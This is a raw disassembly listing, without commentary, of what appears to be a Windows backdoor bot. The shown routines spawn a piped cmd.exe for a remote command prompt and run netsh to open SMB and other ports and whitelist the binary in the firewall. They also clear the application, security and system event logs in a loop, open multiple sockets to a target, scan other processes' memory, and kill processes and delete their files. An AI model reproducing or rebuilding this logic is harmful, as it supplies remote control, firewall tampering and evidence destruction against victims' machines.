loc_41E571: ; CODE XREF: sub_41E4C1+A0�j
push offset a90 ; "90"
push edi
call esi ; dword_437178
test eax, eax
jnz short loc_41E590
push offset dword_43A30C
push [ebp+var_C]
call esi ; dword_437178
test eax, eax
jnz short loc_41E590
loc_41E58B: ; CODE XREF: sub_41E4C1+7A�j
; sub_41E4C1+94�j ...
xor eax, eax
inc eax
jmp short loc_41E592
; ---------------------------------------------------------------------------
loc_41E590: ; CODE XREF: sub_41E4C1+D�j
; sub_41E4C1+25�j ...
xor eax, eax
loc_41E592: ; CODE XREF: sub_41E4C1+CD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E4C1 endp
; =============== S U B R O U T I N E =======================================
sub_41E597 proc near ; CODE XREF: sub_41E5C7+2A�p
; sub_41E5FF+59�p ...
mov eax, dword_4586F4
push esi
mov esi, dword_437044
cmp eax, 0FFFFFFFFh
jz short loc_41E5AB
push eax
call esi ; dword_437044
loc_41E5AB: ; CODE XREF: sub_41E597+F�j
mov eax, dword_4586FC
cmp eax, 0FFFFFFFFh
jz short loc_41E5B8
push eax
call esi ; dword_437044
loc_41E5B8: ; CODE XREF: sub_41E597+1C�j
mov eax, dword_4586F0
cmp eax, 0FFFFFFFFh
jz short loc_41E5C5
push eax
call esi ; dword_437044
loc_41E5C5: ; CODE XREF: sub_41E597+29�j
pop esi
retn
sub_41E597 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5C7 proc near ; CODE XREF: sub_40A9FE+48E4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_4293A0
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push dword_4586F8
call dword_437078 ; WriteFile
test eax, eax
jnz short loc_41E5FA
call sub_41E597
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41E5FA: ; CODE XREF: sub_41E5C7+28�j
xor eax, eax
inc eax
leave
retn
sub_41E5C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5FF proc near ; CODE XREF: sub_41E661+DB�p
; sub_41E661+FA�p ...
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429B60
push offset byte_454A54
push [ebp+arg_0]
call dword_4370FC ; lstrcmpA
test eax, eax
jz short loc_41E641
push 3E8h
call dword_437190 ; Sleep
push [ebp+arg_8]
push offset aS_5 ; "%s"
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
add esp, 10h
jmp short loc_41E65D
; ---------------------------------------------------------------------------
loc_41E641: ; CODE XREF: sub_41E5FF+1D�j
push [ebp+arg_8]
lea eax, [ebp+var_2710]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
call sub_41E597
loc_41E65D: ; CODE XREF: sub_41E5FF+40�j
xor eax, eax
leave
retn
sub_41E5FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E661 proc near ; DATA XREF: sub_41E7BE+177�o
var_271C = byte ptr -271Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 271Ch
call sub_429B60
push ebx
push esi
push edi
mov esi, 2710h
xor edi, edi
mov ebx, offset dword_458714
loc_41E67D: ; CODE XREF: sub_41E661+7D�j
; sub_41E661+E3�j
push esi
lea eax, [ebp+var_271C]
push edi
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_271C]
push esi
push eax
push dword_4586F4
call dword_437104 ; PeekNamedPipe
test eax, eax
jz loc_41E74F
cmp [ebp+var_4], edi
jnz short loc_41E6E0
lea eax, [ebp+var_8]
push eax
push dword_4586F0
call dword_437100 ; GetExitCodeProcess
test eax, eax
jz short loc_41E6D6
cmp [ebp+var_8], 103h
jnz loc_41E773
loc_41E6D6: ; CODE XREF: sub_41E661+66�j
push 0Ah
call dword_437190 ; Sleep
jmp short loc_41E67D
; ---------------------------------------------------------------------------
loc_41E6E0: ; CODE XREF: sub_41E661+52�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_41E6F7
loc_41E6E7: ; CODE XREF: sub_41E661+94�j
cmp [ebp+eax+var_271C], 0Ah
jz short loc_41E749
inc eax
cmp eax, [ebp+var_4]
jb short loc_41E6E7
loc_41E6F7: ; CODE XREF: sub_41E661+84�j
mov [ebp+var_4], 200h
loc_41E6FE: ; CODE XREF: sub_41E661+EC�j
push esi
lea eax, [ebp+var_271C]
push edi
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_271C]
push eax
push dword_4586F4
call dword_437084 ; ReadFile
test eax, eax
jz short loc_41E79B
lea eax, [ebp+var_271C]
push eax
push dword_458700
push ebx
call sub_41E5FF
add esp, 0Ch
jmp loc_41E67D
; ---------------------------------------------------------------------------
loc_41E749: ; CODE XREF: sub_41E661+8E�j
inc eax
mov [ebp+var_4], eax
jmp short loc_41E6FE
; ---------------------------------------------------------------------------
loc_41E74F: ; CODE XREF: sub_41E661+49�j
push offset aCouldNotReadDa ; "Could not read data from proccess.\r\n"
push dword_458700
push ebx
call sub_41E5FF
push [ebp+arg_0]
call sub_423623
add esp, 10h
push 1
call dword_437174 ; ExitThread
loc_41E773: ; CODE XREF: sub_41E661+6F�j
call sub_41E597
push offset aProccessHasTer ; "Proccess has terminated.\r\n"
push dword_458700
push ebx
call sub_41E5FF
push [ebp+arg_0]
call sub_423623
add esp, 10h
push edi
call dword_437174 ; ExitThread
loc_41E79B: ; CODE XREF: sub_41E661+CB�j
push offset aCouldNotReadDa ; "Could not read data from proccess.\r\n"
push dword_458700
push ebx
call sub_41E5FF
push [ebp+arg_0]
call sub_423623
add esp, 10h
push edi
call dword_437174 ; ExitThread
sub_41E661 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E7BE proc near ; CODE XREF: sub_40A9FE+4777�p
var_2884 = byte ptr -2884h
var_174 = byte ptr -174h
var_70 = dword ptr -70h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2884h
call sub_429B60
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov dword_458700, eax
call sub_41E597
xor esi, esi
lea eax, [ebp+var_174]
push esi
push eax
push 104h
mov edi, offset aCmd_exe ; "cmd.exe"
push esi
push edi
push esi
call dword_457020 ; SearchPathA
test eax, eax
jz loc_41E8BE
lea eax, [ebp+var_18]
mov ebx, dword_43710C
push esi
push eax
lea eax, [ebp+var_8]
mov [ebp+var_18], 0Ch
push eax
lea eax, [ebp+var_C]
push eax
mov [ebp+var_10], 1
mov [ebp+var_14], esi
call ebx ; dword_43710C
test eax, eax
jz loc_41E8BE
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push eax
call ebx ; dword_43710C
test eax, eax
jz short loc_41E8BE
mov ebx, dword_43704C
push 3
push esi
push esi
push offset dword_4586F8
call ebx ; dword_43704C
push eax
push [ebp+var_4]
call ebx ; dword_43704C
push eax
call dword_437108 ; DuplicateHandle
test eax, eax
jz short loc_41E8BE
push 10h
lea eax, [ebp+var_28]
push esi
push eax
call sub_429760
push 44h
lea eax, [ebp+var_70]
pop ebx
push ebx
push esi
push eax
call sub_429760
mov eax, [ebp+arg_4]
add esp, 18h
mov [ebp+var_38], eax
mov eax, [ebp+var_8]
mov [ebp+var_34], eax
mov [ebp+var_30], eax
lea eax, [ebp+var_28]
mov [ebp+var_70], ebx
push eax
lea eax, [ebp+var_70]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
lea eax, [ebp+var_174]
push edi
push eax
mov [ebp+var_44], 101h
mov [ebp+var_40], si
call dword_4370D8 ; CreateProcessA
test eax, eax
jnz short loc_41E8C6
loc_41E8BE: ; CODE XREF: sub_41E7BE+3C�j
; sub_41E7BE+6A�j ...
or eax, 0FFFFFFFFh
jmp loc_41E96A
; ---------------------------------------------------------------------------
loc_41E8C6: ; CODE XREF: sub_41E7BE+FE�j
push [ebp+arg_4]
mov edi, dword_437044
call edi ; dword_437044
mov eax, [ebp+var_C]
push [ebp+var_24]
mov dword_4586F4, eax
mov eax, [ebp+var_4]
mov dword_4586FC, eax
mov eax, [ebp+var_28]
mov dword_4586F0, eax
call edi ; dword_437044
cmp [ebp+arg_0], esi
jz short loc_41E8F8
push [ebp+arg_0]
jmp short loc_41E8FD
; ---------------------------------------------------------------------------
loc_41E8F8: ; CODE XREF: sub_41E7BE+133�j
push offset byte_454A54
loc_41E8FD: ; CODE XREF: sub_41E7BE+138�j
push offset dword_458714
call sub_429B03
pop ecx
mov ebx, offset aWhdag1glagf_ ; "WHdAg1glAgf."
pop ecx
push ebx
push offset aSCmdPrompt ; "%s CMD Prompt"
push 0Fh
call sub_4234A7
mov edi, eax
mov ecx, [ebp+var_20]
imul edi, 2724h
add esp, 0Ch
mov dword_46D728[edi], ecx
lea ecx, [ebp+var_2C]
push ecx
push esi
push eax
push offset sub_41E661
push esi
push esi
call dword_437180 ; CreateThread
cmp eax, esi
mov dword_46D72C[edi], eax
jnz short loc_41E968
call dword_437170 ; RtlGetLastWin32Error
push eax
push ebx
lea eax, [ebp+var_2884]
push offset aSFailedToStart ; "%s Failed to start IO thread, error: <%"...
push eax
call sub_429B03
add esp, 10h
loc_41E968: ; CODE XREF: sub_41E7BE+18C�j
xor eax, eax
loc_41E96A: ; CODE XREF: sub_41E7BE+103�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E7BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E96F proc near ; CODE XREF: sub_418FA1+535�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
mov esi, offset dword_4439A8
push edi
lea eax, [ebp+var_404]
push esi
push eax
call dword_4370B4 ; lstrcpyA
lea eax, [ebp+var_404]
push offset aEnabled ; ":*:Enabled:"
push eax
call sub_42A5E0
lea eax, [ebp+var_404]
push offset aSystem_0 ; "SYSTEM"
push eax
call sub_42A5E0
mov edi, dword_437004
add esp, 10h
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push 0
push offset aSystemCurren_4 ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call edi ; dword_437004
lea eax, [ebp+var_404]
push eax
call sub_4293A0
pop ecx
mov ebx, dword_437008
push eax
lea eax, [ebp+var_404]
push eax
push 1
push 0
push esi
push [ebp+var_4]
call ebx ; dword_437008
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push 0
push offset aSystemCurren_5 ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call edi ; dword_437004
lea eax, [ebp+var_404]
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push 1
push 0
push esi
push [ebp+var_4]
call ebx ; dword_437008
pop edi
pop esi
pop ebx
leave
retn
sub_41E96F endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_41EA30 proc near ; DATA XREF: sub_418FA1+541�o
var_A0 = byte ptr -0A0h
var_88 = byte ptr -88h
var_78 = byte ptr -78h
arg_D0 = byte ptr 0D4h
arg_2B8 = byte ptr 2BCh
arg_4A0 = byte ptr 4A4h
arg_700 = byte ptr 704h
arg_8E8 = byte ptr 8ECh
arg_A78 = byte ptr 0A7Ch
arg_E60 = byte ptr 0E64h
mov eax, 1304h
call sub_429B60
push ebx
push ebp
push esi
push edi
push offset aFirewallSetP_0 ; "firewall set portopening TCP 445 NB"
lea eax, [esp+14h+arg_700]
push 200h
push eax
call sub_429BBE
add esp, 0Ch
mov esi, dword_43725C
xor ebp, ebp
lea eax, [esp+10h+arg_700]
push ebp
push ebp
mov ebx, offset aNetsh ; "netsh"
push eax
mov edi, offset aOpen ; "open"
push ebx
push edi
push ebp
call esi ; dword_43725C
push offset aFirewallSetP_1 ; "firewall set portopening TCP 139 NB"
lea eax, [esp+2Ch+arg_8E8]
push 200h
push eax
call sub_429BBE
add esp, 0Ch
lea eax, [esp+28h+arg_8E8]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push offset aFirewallSetP_2 ; "firewall set portopening TCP 1013 BS"
lea eax, [esp+44h+arg_D0]
push 200h
push eax
call sub_429BBE
add esp, 0Ch
lea eax, [esp+40h+arg_D0]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push offset aFirewallSetP_3 ; "firewall set portopening TCP 9999 PORT1"...
lea eax, [esp+5Ch+arg_2B8]
push 200h
push eax
call sub_429BBE
add esp, 0Ch
lea eax, [esp+58h+arg_2B8]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push offset aFirewallSetP_4 ; "firewall set portopening TCP 9991 PORT2"...
lea eax, [esp+74h+arg_4A0]
push 200h
push eax
call sub_429BBE
add esp, 0Ch
lea eax, [esp+70h+arg_4A0]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push 104h
lea eax, [esp+8Ch+var_78]
push eax
push ebp
call dword_437070 ; GetModuleHandleA
push eax
call dword_43717C ; GetModuleFileNameA
lea eax, [esp+98h+var_88]
push eax
push offset aFirewallAddAll ; "firewall add allowedprogram \"%s\" workst"...
lea eax, [esp+0A0h+arg_A78]
push 400h
push eax
call sub_429BBE
add esp, 10h
lea eax, [esp+98h+arg_A78]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
lea eax, [esp+0B0h+var_A0]
push eax
push offset aFirewallSetAll ; "firewall set allowedprogram \"%s\" workst"...
lea eax, [esp+0B8h+arg_E60]
push 400h
push eax
call sub_429BBE
add esp, 10h
lea eax, [esp+0B0h+arg_E60]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_43725C
push ebp
call dword_437174 ; ExitThread
pop edi
pop esi
pop ebp
pop ebx
sub_41EA30 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41EB9C proc near ; DATA XREF: sub_402CE9+3F�o
var_200 = byte ptr -200h
push ebp
mov ebp, esp
sub esp, 200h
push dword_454A30
lea eax, [ebp+var_200]
push offset aFirewallSetPor ; "firewall set portopening TCP %d FD"
push 200h
push eax
call sub_429BBE
add esp, 10h
lea eax, [ebp+var_200]
push 0
push 0
push eax
push offset aNetsh ; "netsh"
push offset aOpen ; "open"
push 0
call dword_43725C
push 0
call dword_437174 ; ExitThread
sub_41EB9C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41EBE9 proc near ; DATA XREF: sub_40A9FE+1C6C�o
; sub_418FA1+21A�o
var_A0 = dword ptr -0A0h
var_90 = dword ptr -90h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A0h
mov eax, [ebp+arg_0]
push ebx
push edi
mov [ebp+var_C], offset aApplication ; "application"
mov dword ptr [eax+0BCh], 1
mov [ebp+var_8], offset aSecurity ; "security"
mov [ebp+var_4], offset aSystem ; "system"
loc_41EC16: ; CODE XREF: sub_41EBE9+AF�j
call dword_456E14 ; DnsFlushResolverCache
call sub_427EDC
xor edi, edi
push 94h
lea eax, [ebp+var_A0]
push edi
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_A0]
mov [ebp+var_A0], 94h
push eax
call dword_437050 ; GetVersionExA
cmp [ebp+var_90], 2
jnz short loc_41EC80
loc_41EC58: ; CODE XREF: sub_41EBE9+95�j
push [ebp+edi*4+var_C]
push 0
call dword_456E90 ; OpenEventLogA
mov ebx, eax
test ebx, ebx
jz short loc_41EC7A
push 0
push ebx
call dword_456EA0 ; ClearEventLogA
push ebx
call dword_456E4C ; CloseEventLog
loc_41EC7A: ; CODE XREF: sub_41EBE9+7F�j
inc edi
cmp edi, 3
jl short loc_41EC58
loc_41EC80: ; CODE XREF: sub_41EBE9+6D�j
push 4F27AC0h
push 32A3DE0h
call sub_41E415
pop ecx
pop ecx
push eax
call dword_437190 ; Sleep
jmp loc_41EC16
sub_41EBE9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EC9D proc near ; DATA XREF: sub_40A9FE+76DE�o
var_9D64 = word ptr -9D64h
var_9D62 = word ptr -9D62h
var_9D60 = dword ptr -9D60h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 9D64h
call sub_429B60
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 48h
mov esi, eax
pop ecx
lea edi, [ebp+var_124]
rep movsd
xor edi, edi
xor ebx, ebx
inc edi
cmp [ebp+var_14], ebx
mov [eax+11Ch], edi
mov eax, [ebp+var_124]
mov [ebp+var_4], eax
mov dword_458748, ebx
jle loc_41EE02
loc_41ECE0: ; CODE XREF: sub_41EC9D+10B�j
push ebx
push edi
push 2
call dword_4372BC ; socket
mov ecx, dword_458748
cmp eax, ebx
mov dword_458750[ecx*4], eax
jl loc_41ED91
shl ecx, 4
push ebx
push 10h
lea eax, [ebp+ecx+var_9D64]
push eax
call sub_429760
mov eax, dword_458748
add esp, 0Ch
shl eax, 4
mov [ebp+eax+var_9D64], 2
lea eax, [ebp+var_120]
push eax
call dword_4372C0 ; inet_addr
mov ecx, dword_458748
push [ebp+var_1C]
mov edx, ecx
shl edx, 4
shl ecx, 4
mov [ebp+edx+var_9D60], eax
mov esi, ecx
call dword_4372C4 ; ntohs
mov [ebp+esi+var_9D62], ax
lea eax, [ebp+esi+var_9D64]
push 10h
push eax
mov eax, dword_458748
push dword_458750[eax*4]
call dword_4372CC ; connect
lea eax, [ebp+arg_0+2]
push edi
push eax
mov eax, dword_458748
push dword_458750[eax*4]
call sub_42F4BE
add esp, 0Ch
loc_41ED91: ; CODE XREF: sub_41EC9D+5C�j
push [ebp+var_18]
call dword_437190 ; Sleep
inc dword_458748
mov eax, dword_458748
cmp eax, [ebp+var_14]
jl loc_41ECE0
jmp short loc_41EE02
; ---------------------------------------------------------------------------
loc_41EDB0: ; CODE XREF: sub_41EC9D+170�j
push 2
push dword_458750[eax*4]
call dword_437288 ; shutdown
test eax, eax
jge short loc_41EDCE
push offset aShutdown ; "shutdown"
call sub_42BEF9
pop ecx
loc_41EDCE: ; CODE XREF: sub_41EC9D+124�j
mov eax, dword_458748
push dword_458750[eax*4]
call sub_42F1A0
test eax, eax
pop ecx
jz short loc_41EDF0
push offset aCloseError ; "close error\n"
call sub_42BEB8
jmp short loc_41EE01
; ---------------------------------------------------------------------------
loc_41EDF0: ; CODE XREF: sub_41EC9D+145�j
push dword_458748
push offset aClosedI ; "closed %i\n"
call sub_42BEB8
pop ecx
loc_41EE01: ; CODE XREF: sub_41EC9D+151�j
pop ecx
loc_41EE02: ; CODE XREF: sub_41EC9D+3D�j
; sub_41EC9D+111�j
dec dword_458748
mov eax, dword_458748
jns short loc_41EDB0
push dword_458750[eax*4]
call dword_4372D8 ; closesocket
cmp [ebp+var_C], 0
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
mov esi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41EE53
cmp [ebp+var_10], 0
jnz short loc_41EE59
lea eax, [ebp+var_120]
push eax
push ebx
push edi
lea eax, [ebp+var_A0]
push esi
push eax
push [ebp+var_4]
call sub_41CE4A
add esp, 18h
loc_41EE53: ; CODE XREF: sub_41EC9D+192�j
cmp [ebp+var_10], 0
jz short loc_41EE75
loc_41EE59: ; CODE XREF: sub_41EC9D+198�j
lea eax, [ebp+var_120]
push eax
push ebx
push edi
lea eax, [ebp+var_A0]
push esi
push eax
push [ebp+var_4]
call sub_41CDD4
add esp, 18h
loc_41EE75: ; CODE XREF: sub_41EC9D+1BA�j
push [ebp+var_20]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
pop edi
pop esi
pop ebx
sub_41EC9D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EE89 proc near ; CODE XREF: sub_41F0F5+353�p
; sub_41F0F5+385�p
var_5504 = byte ptr -5504h
var_5503 = byte ptr -5503h
var_504 = byte ptr -504h
var_503 = byte ptr -503h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_3C = byte ptr 44h
push ebp
mov ebp, esp
mov eax, 5504h
call sub_429B60
and [ebp+var_5504], 0
push ebx
push esi
push edi
mov ecx, 13FFh
xor eax, eax
lea edi, [ebp+var_5503]
and [ebp+var_504], 0
rep stosd
stosw
stosb
mov ecx, 13Fh
xor eax, eax
lea edi, [ebp+var_503]
push [ebp+arg_20]
rep stosd
stosw
stosb
xor edi, edi
push edi
push 1F0FFFh
call dword_437114 ; OpenProcess
mov [ebp+var_4], eax
mov eax, [ebp+arg_10]
mov [ebp+arg_10], eax
jmp loc_41EFD8
; ---------------------------------------------------------------------------
loc_41EEEA: ; CODE XREF: sub_41EE89+152�j
push edi
lea eax, [ebp+var_504]
push 500h
push eax
push [ebp+arg_10]
push [ebp+var_4]
call dword_437110 ; ReadProcessMemory
cmp eax, edi
jz loc_41EFE1
lea eax, [ebp+var_504]
push eax
lea eax, [ebp+var_5504]
push eax
call sub_42A5E0
cmp off_447AEC, edi
pop ecx
pop ecx
jz loc_41EFBD
mov esi, offset off_447AEC
mov ebx, esi
loc_41EF33: ; CODE XREF: sub_41EE89+12E�j
push dword ptr [esi]
lea eax, [ebp+var_5504]
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_41EFB0
push dword ptr [ebx-4]
lea eax, [ebp+arg_3C]
push eax
push dword ptr [esi]
mov esi, offset dword_45AE60
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push offset aSFoundStringSI ; "%s Found string \"%s\" in \"%s\" File \"%s\""
push esi
call sub_429B03
add esp, 18h
cmp [ebp+arg_4], edi
jnz short loc_41EF7C
push esi
push [ebp+arg_C]
push [ebp+arg_0]
call sub_41CE4A
add esp, 0Ch
loc_41EF7C: ; CODE XREF: sub_41EE89+E2�j
push 7D0h
call dword_437190 ; Sleep
sub esp, 128h
lea esi, [ebp+arg_18]
push 4Ah
pop ecx
mov edi, esp
push [ebp+arg_C]
rep movsd
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41EFEF
add esp, 138h
xor edi, edi
loc_41EFB0: ; CODE XREF: sub_41EE89+BC�j
add ebx, 8
mov esi, ebx
cmp [ebx], edi
jnz loc_41EF33
loc_41EFBD: ; CODE XREF: sub_41EE89+9D�j
push 5000h
lea eax, [ebp+var_5504]
push edi
push eax
call sub_429760
add esp, 0Ch
inc [ebp+arg_10]
mov eax, [ebp+arg_10]
loc_41EFD8: ; CODE XREF: sub_41EE89+5C�j
cmp eax, [ebp+arg_14]
jbe loc_41EEEA
loc_41EFE1: ; CODE XREF: sub_41EE89+7C�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_41EE89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EFEF proc near ; CODE XREF: sub_41EE89+11A�p
; sub_41F0F5+25F�p ...
var_228 = dword ptr -228h
var_224 = byte ptr -224h
var_208 = byte ptr -208h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_34 = byte ptr 3Ch
push ebp
mov ebp, esp
sub esp, 228h
and [ebp+var_228], 0
push esi
push edi
mov ecx, 88h
push [ebp+arg_18]
xor eax, eax
lea edi, [ebp+var_224]
rep stosd
push 8
call sub_4290AC ; CreateToolhelp32Snapshot
mov edi, eax
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call sub_4290A6 ; Module32First
test eax, eax
jz loc_41F0E3
mov esi, offset dword_45AE60
loc_41F040: ; CODE XREF: sub_41EFEF+EE�j
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+arg_34]
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_41F0CE
lea eax, [ebp+var_108]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
push [ebp+arg_18]
push 0
push 1F0FFFh
call dword_437114 ; OpenProcess
push 0
push eax
mov [ebp+var_4], eax
call dword_437118 ; TerminateProcess
push 1F4h
call dword_437190 ; Sleep
lea eax, [ebp+var_108]
push eax
call dword_437060 ; DeleteFileA
test eax, eax
jz short loc_41F0CE
lea eax, [ebp+var_108]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push offset aSTerminatedAnd ; "%s Terminated and deleted %s"
push esi
call sub_429B03
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_41F0CE
push esi
push [ebp+arg_C]
push [ebp+arg_0]
call sub_41CE4A
add esp, 0Ch
loc_41F0CE: ; CODE XREF: sub_41EFEF+64�j
; sub_41EFEF+AE�j ...
lea eax, [ebp+var_228]
push eax
push edi
call sub_4290A0 ; Module32Next
test eax, eax
jnz loc_41F040
loc_41F0E3: ; CODE XREF: sub_41EFEF+46�j
push [ebp+var_4]
mov esi, dword_437044
call esi ; dword_437044
push edi
call esi ; dword_437044
pop edi
pop esi
leave
retn
sub_41EFEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F0F5 proc near ; DATA XREF: sub_40A9FE+1DDB�o
var_260 = byte ptr -260h
var_1D5 = byte ptr -1D5h
var_1D4 = dword ptr -1D4h
var_1B0 = byte ptr -1B0h
var_AC = dword ptr -0ACh
var_A8 = byte ptr -0A8h
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 260h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 27h
mov esi, eax
pop ecx
lea edi, [ebp+var_AC]
rep movsd
mov esi, offset dword_45AF60
mov dword ptr [eax+98h], 1
mov eax, [ebp+var_AC]
push 80h
push esi
push 0
mov [ebp+var_8], eax
call dword_437070 ; GetModuleHandleA
push eax
call dword_43717C ; GetModuleFileNameA
push 5Ch
push esi
call sub_42B060
push offset byte_454A54
push offset asc_44DABC ; "\\"
push eax
mov dword_45AFE0, eax
call sub_4279FA
add esp, 14h
push 0
push 2
call sub_4290AC ; CreateToolhelp32Snapshot
lea ecx, [ebp+var_1D4]
mov [ebp+var_C], eax
push ecx
push eax
mov [ebp+var_1D4], 128h
mov byte ptr [ebp+arg_0+3], 1
call sub_4290B8 ; Process32First
jmp loc_41F49A
; ---------------------------------------------------------------------------
loc_41F18A: ; CODE XREF: sub_41F0F5+3A7�j
push dword_45AFE0
lea eax, [ebp+var_1B0]
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_41F1A4
and byte ptr [ebp+arg_0+3], al
loc_41F1A4: ; CODE XREF: sub_41F0F5+AA�j
and [ebp+var_1D5], 0
mov eax, 600h
push eax
mov [ebp+var_10], eax
call sub_4297B8
pop ecx
mov esi, eax
lea eax, [ebp+var_10]
push 1
xor ebx, ebx
push eax
push esi
mov [esi], ebx
call sub_4290CA ; GetUdpTable
cmp [esi], ebx
jle short loc_41F209
lea edi, [esi+8]
loc_41F1D3: ; CODE XREF: sub_41F0F5+112�j
mov ax, [edi]
push eax
call dword_4372A8 ; ntohs
mov [ebp+var_4], eax
push 8Ch
lea eax, [ebp+var_260]
push 0
push eax
call sub_429760
add esp, 0Ch
cmp word ptr [ebp+var_4], 45h
jz loc_41F4C1
inc ebx
add edi, 8
cmp ebx, [esi]
jl short loc_41F1D3
loc_41F209: ; CODE XREF: sub_41F0F5+D9�j
push esi
call sub_4298F2
pop ecx
xor edi, edi
push edi
push 45h
push offset dword_457CF8
call dword_456F7C ; inet_addr
push eax
call sub_4023BC
add esp, 0Ch
test eax, eax
jnz loc_41F4FB
loc_41F231: ; CODE XREF: sub_41F0F5+17B�j
mov ebx, dword_437178
lea esi, off_448918[edi]
lea eax, [ebp+var_1B0]
push dword ptr [esi]
push eax
call ebx ; dword_437178
test eax, eax
jnz short loc_41F24F
and byte ptr [ebp+arg_0+3], al
loc_41F24F: ; CODE XREF: sub_41F0F5+155�j
lea eax, [ebp+var_1B0]
push eax
push dword ptr [esi]
call sub_427B4E
pop ecx
